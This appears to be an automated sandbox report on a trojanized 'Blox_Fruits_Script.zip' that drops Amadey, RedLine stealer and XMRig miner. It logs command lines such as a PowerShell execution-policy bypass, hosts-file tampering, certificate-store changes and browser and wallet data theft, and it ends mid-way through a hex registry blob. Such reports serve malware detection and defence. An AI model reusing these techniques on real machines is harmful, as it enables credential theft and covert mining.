Malware Analysis Report

2025-08-06 00:06

Sample ID 240223-maewzsef4s
Target Blox_Fruits_Script.zip
SHA256 37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077
Tags
amadey redline xmrig 11 discovery evasion infostealer miner persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

37ffba131c763e2630433b2865a8149508af32f387fb5808cfaf539815bb5077

Threat Level: Known bad

The file Blox_Fruits_Script.zip was found to be: Known bad.

Malicious Activity Summary

amadey redline xmrig 11 discovery evasion infostealer miner persistence spyware stealer trojan

xmrig

Amadey

RedLine

RedLine payload

XMRig Miner payload

Drops file in Drivers directory

Creates new service(s)

Stops running service(s)

Checks BIOS information in registry

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Modifies system executable filetype association

Launches sc.exe

Checks installed software on the system

Executes dropped EXE

Program crash

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Modifies registry class

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-02-23 10:17

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

144s

Command Line

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\wget.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp

Files

memory/3732-0-0x0000000000400000-0x00000000008F2000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240214-en

Max time kernel

117s

Max time network

129s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\vhXDYuQByxPS.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2bc

Network

Country Destination Domain Proto
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 185.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp

Files

memory/932-4-0x0000017472720000-0x0000017472742000-memory.dmp

memory/932-5-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp

memory/932-6-0x000001745A270000-0x000001745A280000-memory.dmp

memory/932-7-0x000001745A270000-0x000001745A280000-memory.dmp

memory/932-10-0x00000174729D0000-0x0000017472A46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2nzzbxdd.cwl.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/932-32-0x000001745A270000-0x000001745A280000-memory.dmp

memory/932-41-0x00007FFFF11C0000-0x00007FFFF1BAC000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

118s

Max time network

141s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

148s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Signatures

Amadey

trojan amadey

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
File created C:\Windows\system32\drivers\etc\hosts C:\ProgramData\SystemFiles\csrss.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\SystemFiles\csrss.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\conhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\conhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\SystemFiles\csrss.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901 N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks installed software on the system

discovery

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\services\plugin0222

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3